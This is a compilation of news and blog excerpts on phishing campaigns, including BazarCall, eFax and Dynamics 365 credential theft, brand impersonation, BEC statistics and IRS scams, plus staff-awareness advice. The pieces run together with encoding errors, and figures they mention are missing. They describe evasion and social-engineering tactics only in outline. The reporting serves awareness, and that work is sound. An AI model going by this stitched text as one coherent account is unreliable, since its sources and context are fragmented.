No social shares required
No specific joining or subscription to any social channel or hacking forum is needed
Trellix released a recent report on the evolution of BazarCall social engineering tactics. Initially BazarCall campaigns appeared in late 2020 and researchers at Trellix noticed a continuous growth in attacks pertaining to this campaign.
Reports say at first, it delivered BazaarLoader (backdoor) which was used as an entry point to deliver ransomware. A BazaarLoader infection will lead to the installation of Conti Ransomware in a span of 32 hours.
It was also found to be delivering other malware such as Trickbot, Gozi IFSB, IcedID and more. In this case, âBazarCall has ceaselessly adapted and evolved its social engineering tacticsâ. These campaigns were found to be most active in United States and Canada. They were also targeting some Asian countries like India and China.
What is BazarCall?
BazarCall begins with a phishing email but from there deviates to a novel distribution method â using phone call centers to distribute malicious Excel documents that install malware.
In BazarCallâs case, targeted users must dial the number. And when they do, the users are connected with actual humans on the other end of the line, who then provide step-by-step instructions for installing malware into their devices.
About 1 in 5 phishing email messages reach workers’ inboxes, as attackers get better at dodging Microsoft’s platform defenses and defenders run into processing limitations.
Source: Andrea Danti via Alamy Stock Photo
This week’s report that cyberattackers are laser-focused on crafting attacks specialized to bypass Microsoft’s default security showcases an alarming evolution in phishing tactics, security experts said this week.
Threat actors are getting better at slipping phishing attacks through the weak spots in platform email defenses, using a variety of techniques, such as zero-point font obfuscation, hiding behind cloud-messaging services, and delaying payload activation, for instance. They’re also doing more targeting and research on victims.
As a result, nearly 1 in 5 phishing emails (18.8%) bypassed Microsoft’s platform defenses and landed in workers’ inboxes in 2022, a rate that increased 74% compared to 2020, according to research published on Oct. 6 by cybersecurity firm Check Point Software. Attackers increasingly used techniques to pass security checks, such as Sender Policy Framework (SPF), and obfuscate functional components of an e-mail, such as using zero-size fonts or hiding malicious URLs from analysis.
The increasing capabilities of attackers is due to the better understanding of current defenses, says Gil Friedrich, vice president of email security at Avanan, an email security firm acquired by Check Point in August 2021.
“It is a family of 10 to 20 techniques, but they all lead to the objective of deceiving a company’s security layers,” he says. “The end result is always an email that looks genuine to the recipient but looks different to the algorithm that analyzes the content.”
Meanwhile, cybercriminals services, such as phishing-as-a-service and malware-as-a-service, are encapsulating the most successful techniques into easy-to-use offerings. In a survey of penetration testers and red teams, nearly half (49%) considered phishing and social engineering to be the attack techniques with the best return on investment.
In a widespread campaign, threat actors use a compromised Dynamics 365 Customer Voice business account and a link posing as a survey to steal Microsoft 365 credentials.
An elaborate and rather unusual phishing campaign is spoofing eFax notifications and using a compromised Dynamics 365 Customer Voice business account to lure victims into giving up their credentials via microsoft.com pages.
Threat actors have hit dozens of companies through the broadly disseminated campaign, which is targeting Microsoft 365 users from a diverse range of sectors â including energy, financial services, commercial real estate, food, manufacturing, and even furniture-making, researchers from the Cofense Phishing Defense Center (PDC) revealed in a blog post published Wednesday.
The campaign uses a combination of common and unusual tactics to lure users into clicking on a page that appears to lead them to a customer feedback survey for an eFax service, but instead steals their credentials.
Attackers impersonate not only eFax but also Microsoft by using content hosted on multiple microsoft.com pages in several stages of the multistage effort. The scam is one of a number of phishing campaigns that Cofense has observed since spring that use a similar tactic, says Joseph Gallop, intelligence analysis manager at Cofense.
âIn April of this year, we began to see a significant volume of phishing emails using embedded ncv.microsoft.com survey links of the sort used in this campaign,â he tells Dark Reading.
Combination of Tactics
The phishing emails use a conventional lure, claiming the recipient has received a 10-page corporate eFax that demands his or her attention. But things diverge from the beaten path after that, Cofense PDC’s Nathaniel Sagibanda explained in the Wednesday post.
The recipient most likely will open the message expecting it’s related to a document that needs a signature. “However, that isn’t what we see as you read the message body,” he wrote.
Instead, the email includes what seems like an attached, unnamed PDF file that’s been delivered from a fax that does include an actual file â an unusual feature of a phishing email, according to Gallop.
“While a lot of credential phishing campaigns use links to hosted files, and some use attachments, it’s less common to see an embedded link posing as an attachment,” he wrote.
The plot thickens even further down in the message, which contains a footer indicating that it was a survey site â such as those used to provide customer feedback â that generated the message, according to the post.
Mimicking a Customer Survey
When users click the link, they are directed to a convincing imitation of an eFax solution page rendered by a Microsoft Dynamics 365 page that’s been compromised by attackers, researchers said.
This page includes a link to another page, which appears to lead to a Microsoft Customer Voice survey to provide feedback on the eFax service, but instead takes victims to a Microsoft login page that exfiltrates their credentials.
To further enhance legitimacy on this page, the threat actor went so far as to embed a video of eFax solutions for spoofed service details, instructing the user to contact “@eFaxdynamic365” with any inquiries, researchers said.
The “Submit” button at the bottom of the page also serves as additional confirmation that the threat actor used a real Microsoft Customer Voice feedback form template in the scam, they added.
The attackers then modified the template with “spurious eFax information to entice the recipient into clicking the link,” which leads to a faux Microsoft login page that sends their credentials to an external URL hosted by attackers, Sagibanda wrote.
Fooling a Trained Eye
While the original campaigns were much simpler â including only minimal information hosted on the Microsoft survey â the eFax spoofing campaign goes further to bolster the campaignâs legitimacy, Gallop says.
Its combination of multistage tactics and dual impersonation may allow messages to slip through secure email gateways as well as fool even the savviest of corporate users whoâve been trained to spot phishing scams, he notes.
“Only the users that continue to check the URL bar at each stage throughout the entire process would be certain to identify this as a phishing attempt,” Gallop says.
In fact, attackers took on the persona of Microsoft most often in campaigns observed in the first half of 2022, researchers found, though Facebook remains the most impersonated brand in phishing campaigns observed so far this year.
According to the report by researchers at Vade, phishing attacks abusing the Microsoft brand increased 266 percent in the first quarter of 2022, compared to the year prior. Fake Facebook messages are up 177 percent in the second quarter of 2022 within the same timeframe.
The study by Vade analyzed unique instances of phishing URLs used by criminals carrying out phishing attacks and not the number of phishing emails associated with the URLs. The report tallied the 25 most commonly targeted companies, along with the most abused industries and days of the week for phishing emails.
Phishing By the Numbers
Other top abused brands in phishing attacks include Credit Agricole, WhatsApp, and French telecommunications company Orange. Popular brands also included PayPal, Google and Apple (see chart).
Through the first half of 2022, 34 percent of all unique phishing attacks tracked by the researchers impersonated financial services brands. The next most popular industry for criminals to abuse is cloud and the firms Microsoft, Google and Adobe. Social media was also a popular target with Facebook, WhatsApp and Instagram leading the list of brands leveraged in attacks.
The report revealed the most popular days for sending phishing emails is between Monday and Wednesday. Less than 20 percent of malicious emails are sent on the weekend.
âPhishing attacks are more sophisticated than ever,â wrote Adrien Gendre, chief tech and product officer at Vade in an email to Threatpost.
âHackers have an arsenal of tools at their disposal to manipulate end users and evade email security, including phishing kits that can identify when they are being scanned by a vendor and trigger benign webpages to avoid detection. End users need to be continually trained to identify the latest phishing techniques,â he wrote.
Welcome to our July 2022 review of phishing attacks, in which we explore the latest email scams and the tactics that cyber criminals use to trick people into handing over their personal data.
This month, we look at a cyber attack at OpenSea, a US school district that was tricked into transferring funds to a crook and a report on the rising threat of phishing.
NFT marketplace warns users of phishing scams
Last month, the worldâs largest NFT (non-fungible token) marketplace, OpenSea, disclosed a data breach in which usersâ email addresses were compromised.
The organisationâs head of security, Cory Hardman, said that the breach occurred when an employee at a third-party email delivery vendor downloaded the details of OpenSea users and newsletter subscribers.
OpenSea has since warned that the information could be used to launch phishing attacks.
âIf you have shared your email with OpenSea in the past, you should assume you were impacted. We are working with Customer.io in their ongoing investigation, and we have reported this incident to law enforcement,â Hardman said.
âBecause the data compromise included email addresses, there may be a heightened likelihood for email phishing attempts.â
OpenSea warned users via an email notification
Hardman provided tips to help OpenSea users spot phishing attacks. He urged people to keep an eye out for emails that use domains replicating the genuine OpenSea.io address.
Cyber criminals could do this by using a different top-level domain (such as opensea.org), or by deliberately misspelling the domain name (such as opensae.io).
Hardman also advised users not to download or open email attachments if they believe the message is suspicious, and to never sign wallet transactions if prompted directly via email.
In addition to the theft, the cyber criminals shared a phishing link on Beepleâs Twitter account that, if clicked, took money directly from their wallets.
Incidents such as this and the OpenSea hack demonstrate the challenges that NFT trading presents. Although many people are enticed into NFTs because the market is unregulated, that also creates major security risks.
Whereas banks and other regulated trading platforms are required to take steps to protect peopleâs assets â and will typically have proof of unauthorised access â the crypto culture emphasises personal responsibility.
If a cyber criminal compromises a crypto wallet, victims have little recourse and will have to accept their loss.
School district accidentally wires $200,000 to fraudulent bank
The Floyd County School District in in Georgia admitted in June that it had wired $197,672.76 (about ÂŁ164,000) to a bank account controlled by cyber criminals.
Officials said they received the request from an email address seemingly associated with Ben Hill Roofing, an organisation that had previously worked with a school in the district.
Floyd County Schools made the payment on 29 April, and was only alerted to its mistake after the real Ben Hill Roofing submitted an invoice.
Speaking to a local news outlet, the school district said: âFloyd County Schools has been made aware of a spear phishing incident, which is a targeted email attack pretending to be from a trusted sender. This cyber-attack resulted in funds being stolen from the school system by an outside source.â
It added: âWe are working with local law enforcement, GEMA, GBI, and insurance officials to recover the funds.
âBecause of the cyber security measures FCS has put in place over the past few years, school system officials believe this is an isolated incident. Due to the ongoing investigation, more details cannot be released at this time.â
Floyd County Schools has since recovered almost all of the stolen funds following a police investigation. Officers traced the stolen money to a bank in Texas, which had already flagged the account as suspicious.
Itâs the highest number of phishing attacks that has ever been reported in a quarter, and it follows a steady increase in attacks throughout the past year. In April 2021, the APWG observed just over 200,000 phishing attacks. By March 2022, it almost doubled, to 384,291.
According to the report, the industry most likely to be targeted was the financial sector. It found that 23.6% of all incidents affected organisations that provide such services.
The next most frequent targets were software-as-a-service and webmail providers (20.5%) and e-commerce sites and retail stores (14.6%).
The report also found that 12.5% of phishing attacks target social media sites, while cryptocurrency platforms account for 6.6% of incidents.
According to John Wilson, Senior Fellow of Threat Research at HelpSystems, the majority of phishing attacks are conducted using BEC (business e-mail compromise).
Wilson noted that in the first quarter of 2022, 82% of BEC messages were sent from free webmail accounts. Gmail is the most popular provider, accounting for 60% of BEC scams.
Meanwhile, 18% of BEC messages used email domains owned by the attacker.
The report also found that the average sum that scammers requested in wire transfer BEC attacks in Q1 2022 was $84,512 (about âŹ98,000). This is a significant increase over the previous quarter, in which scammers requested âŹ50,027 (about âŹ58,000) on average.
Can you spot a scam?
All organisations are vulnerable to phishing, no matter their size or the sector, so itâs essential to understand how you might be targeted and what you can do to prevent a breach.
This 45-minute course uses real-world examples like the ones weâve discussed here to explain how phishing attacks work, the tactics that cyber criminals use and how you can detect malicious emails.
Phishing is among the biggest cyber threats facing organisations. According to Proofpointâs 2021 State of the Phish Report, more than 80% of organisations fell victim to a phishing attack last year.
One of the most frustrating things about this is that most people know what phishing is and how it works, but many still get caught out.
The growing sophisticated of phishing scams has contributed to that. They might still have the same objective â to steal our personal data or infect our devices â but there are now countless ways to do that.
In this blog, we look at five of the most common types of phishing email to help you spot the signs of a scam.
1. Email phishing
Most phishing attacks are sent by email. The crook will register a fake domain that mimics a genuine organisation and sends thousands of generic requests.
The fake domain often involves character substitution, like using ârâ and ânâ next to each other to create ârnâ instead of âmâ.
In other cases, the fraudsters create a unique domain that includes the legitimate organisationâs name in the URL. The example below is sent from âolivia@amazonsupport.comâ.
The recipient might see the word âAmazonâ in the senderâs address and assume that it was a genuine email.
There are many ways to spot a phishing email, but as a general rule, you should always check the email address of a message that asks you to click a link or download an attachment.Â
2. Spear phishing
There are two other, more sophisticated, types of phishing involving email.
The first, spear phishing, describes malicious emails sent to a specific person. Criminals who do this will already have some or all of the following information about the victim:
Their name;
Place of employment;
Job title;
Email address; and
Specific information about their job role.
You can see in the example below how much more convincing spear phishing emails are compared to standard scams.
The fraudster has the wherewithal to address the individual by name and (presumably) knows that their job role involves making bank transfers on behalf of the company.
The informality of the email also suggests that the sender is a native English speaker, and creates the sense that this is a real message rather than a template.
3. Whaling
Whaling attacks are even more targeted, taking aim at senior executives. Although the end goal of whaling is the same as any other kind of phishing attack, the technique tends to be a lot subtler.
Tricks such as fake links and malicious URLs arenât helpful in this instance, as criminals are attempting to imitate senior staff.
Whaling emails also commonly use the pretext of a busy CEO who wants an employee to do them a favour.
Emails such as the above might not be as sophisticated as spear phishing emails, but they play on employeesâ willingness to follow instructions from their boss. Recipients might suspect that something is amiss but are too afraid to confront the sender to suggest that they are being unprofessional.
4. Smishing and vishing
With both smishing and vishing, telephones replace emails as the method of communication.
Smishing involves criminals sending text messages (the content of which is much the same as with email phishing), and vishing involves a telephone conversation.
One of the most common smishing pretexts are messages supposedly from your bank alerting you to suspicious activity.
In this example, the message suggests that you have been the victim of fraud and tells you to follow a link to prevent further damage. However, the link directs the recipient to a website controlled by the fraudster and designed to capture your banking details.
5. Angler phishing
A relatively new attack vector, social media offers several ways for criminals to trick people. Fake URLs; cloned websites, posts, and tweets; and instant messaging (which is essentially the same as smishing) can all be used to persuade people to divulge sensitive information or download malware.
Alternatively, criminals can use the data that people willingly post on social media to create highly targeted attacks.
As this example demonstrates, angler phishing is often made possible due to the number of people containing organisations directly on social media with complaints.
Organisations often use these as an opportunity to mitigate the damage â usually by giving the individual a refund.
However, scammers are adept at hijacking responses and asking the customer to provide their personal details. They are seemingly doing this to facilitate some form of compensation, but it is instead done to compromise their accounts.
Your employees are your last line of defence
Organisations can mitigate the risk of phishing with technological means, such as spam filters, but these have consistently proven to be unreliable.
Malicious emails will still get through regularly, and when that happens, the only thing preventing your organisation from a breach is your employeesâ ability to detect their fraudulent nature and respond appropriately.
OurâŻPhishing Staff Awareness CourseâŻhelps employees do just that, as well as explaining what happens when people fall victim and how they can mitigate the threat of an attack.
New research from the email security firm Inky has revealed that more than 1000 emails were sent from NHS inboxes over a six month period.
The firm has claimed that the campaign, beginning October 2021, escalated âdramaticallyâ in March of this year.
After the findings were reported to the NHS on April 13, Inky reported that the volume of attacks fell significantly to just a âfewâ.
âThe majority were fake new document notifications with malicious links to credential harvesting sites that targeted Microsoft credentials. All emails also had the NHS email footer at the bottom,â Inky explained.
Weâre sure youâve heard of the KISS principle: Keep It Simple and Straightforward.
In cybersecurity, KISS cuts two ways.
KISS improves security when your IT team avoids jargon and makes complex-but-important tasks easier to understand, but it reduces security when crooks steer clear of mistakes that would otherwise give their game away.
For example, most of the phishing scams we receive are easy to spot because they contain at least one, and often several, very obvious mistakes.
Incorrect logos, incomprehensible grammar, outright ignorance about our online identity, weird spelling errors, absurd punctuation!!!!, or bizarre scenarios (no, your surveillance spyware definitely did not capture live video through the black electrical tape we stuck over our webcam)âŠ
âŠall these lead us instantly and unerringly to the [Delete] button.
If you donât know our name, donât know our bank, donât know which languages we speak, donât know our operating system, donât know how to spell ârespond immediatelyâ, heck, if you donât realise that Riyadh is not a city in Austria, youâre not going to get us to click.
Thatâs not so much because youâd stand out as a scammer, but simply that your email would advertise itself as âclearly does not belong hereâ, or as âobviously sent to the wrong personâ, and weâd ignore it even if you were a legitimate business. (After that, weâd probably blocklist all your emails anyway, given your attitude to accuracy, but thatâs an issue for another day.)
Indeed, as weâve often urged on Naked Security, if spammers, scammers, phishers or other cybercriminals do make the sort of blunder that gives the game away, make sure you spot their mistakes, and make them pay for their blunder by deleting their message at once.
Threat intelligence firm Resecurity details how crooks are delivering IRS tax scams and phishing attacks posing as government vendors.
Cybercriminals are leveraging advanced tactics in their phishing-kits granting them a high delivery success rate of spoofed e-mails which contain malicious attachments right before the end of the 2021 IRS income tax return deadline in the U.S. April 18th, 2022 â there was a notable campaign detected which leveraged phishing e-mails impersonating the IRS, and in particular one of the industry vendors who provide solutions to government agencies which including e-mailing, digital communications management, and the content delivery system which informs citizens about various updates.
Cybercriminals purposely choose specific times when all of us are busy with taxes, and preparing for holidays (e.g., Easter), thatâs why you need to be especially careful during these times.
The IT services vendor actors impersonated is widely used by major federal agencies, including the DHS, and other such WEB-sites of States and Cities in the U.S. The identified phishing e-mail warned the victims about overdue payments to the IRS, which should then be paid via PayPal, the e-mail contained an HTML attachment imitating an electronic invoice.
Notably, the e-mail doesnât contain any URLs, and has been successfully delivered to the victimâs inbox without getting flagged as potential spam. Based on the inspected headers, the e-mail has been sent through multiple âhopsâ leveraging primarily network hosts and domains registered in the U.S.:
Itâs worth noting, on the date of detection none of the involved hosts have previously been âblacklistedâ nor have they had any signs of negative IP or abnormal domain reputation: